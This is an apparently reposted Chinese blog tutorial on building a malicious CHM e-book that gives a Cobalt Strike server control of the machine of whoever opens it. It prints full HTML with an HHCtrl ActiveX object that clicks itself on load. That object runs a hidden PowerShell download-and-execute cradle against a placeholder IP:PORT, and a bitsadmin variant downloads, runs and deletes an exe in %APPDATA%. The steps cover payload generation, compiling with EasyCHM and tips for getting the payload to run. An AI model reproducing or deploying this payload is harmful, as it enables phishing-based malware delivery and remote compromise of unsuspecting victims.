当前位置:   article > 正文

电子书(chm)-加载JS--CS上线

电子书(chm)-加载JS--CS上线

免责声明:

本文仅做技术交流与学习...

目录

cs--web投递

html(js)代码

 html生成chm工具--EasyCHM

 1-选择powershell 模式 生成

2-选择bitsadmin模式生成

chm反编译成html


cs--web投递

cs配置监听器--->攻击---->web投递---> 

端口选择没占用的,

URL路径到时候会在你的服务器自动生成,

选择监听器.

 

html(js)代码

  1. <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
  2. command exec
  3. <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  4. <PARAM name="Command" value="ShortCut">
  5. <PARAM name="Button" value="Bitmap::shortcut">
  6. <PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://IP:PORT/a'))">
  7. <PARAM name="Item2" value="273,1,1">
  8. </OBJECT>
  9. <SCRIPT>
  10. x.Click();
  11. </SCRIPT>
  12. </body></html>

生成后的初始命令:
1、powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxx/a'))"
2、cmd.exe /c bitsadmin /transfer 0218 http://xxx:xx/a %APPDATA%\0218.exe&%APPDATA%\0218.exe&del %APPDATA%\0218.exe

要注意三个地方:

<PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://IP:PORT/a'))">

(1) value值的第一个为逗号

(2)生成的命令带双引号的话就去掉

(3)调用cmd或powershell程序后面要加逗号


 html生成chm工具--EasyCHM

生成chm之前提前把html放在一个文件夹里.

--->成功生成chm 


 1-选择powershell 模式 生成

 运行--->


2-选择bitsadmin模式生成

与上面方法一样

--生成payload后--->替换到html中---->编译生成chm---->执行

 

需要数据传输完成才能上线.


chm反编译成html

hh.exe软件windows自带.

hh.exe -decompile .\\html xxx.chm

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/酷酷是懒虫/article/detail/742049
推荐阅读
相关标签
  

闽ICP备14008679号